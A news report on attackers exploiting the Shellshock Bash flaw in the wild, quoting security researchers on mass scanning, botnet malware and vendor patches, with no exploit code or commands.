Bug afflicting Linux, Unix and Mac has already been abused.
The cybersecurity community has spotted a flurry of Shellshock exploits in the wild as it rushes to patch vulnerable systems which may number more than 500 million.
Hackers are pinging servers en masse to check if they are vulnerable to the flaw in the command line Bash common to the Linux, Unix and Mac operating systems, with some installing malware onto unpatched machines.
Waylon Grange, senior malware researcher at security firm Blue Coat, said: "Since yesterday’s announcement of the [Shellshock] bug we’ve seen attackers waste no time before scanning the Internet.
"Additionally, we’ve also started seeing DDoS [distributed denial of service] botnets trying to utilise this in their attacks. For a little while I’d expect to see an ever-increasing amount of web traffic targeting this vulnerability."
Grange’s fears were corroborated by independent security researchers Yinette, which posted a malware sample to code repository GitHub that contained a command and control (C&C) element, which allows hackers to send instructions to infected computers.
Once a machine has been made part of a botnet it can be used to perpetrate further attacks on behalf of the hacker, including DDoS attacks in which servers are flooded with traffic until they crash.
Robert Graham of Errata Security added that it was likely most vulnerable systems that hackers could detect were already compromised by yesterday morning.
"One key question is whether Mac OS X and iPhone [Dynamic Host Configuration Protocol] service is vulnerable," he added. "Once the worm gets behind a firewall and runs a hostile DHCP server, that would ‘game over’ for large networks."
Many large Linux vendors have already issued patches for the bug, but Red Hat later warned that its patch was incomplete after discovering a related flaw, which was then fixed.
"All customers are strongly encouraged to apply the update as this flaw is being actively attacked in the wild," said security engineer Huzaifa Sidhpurwala.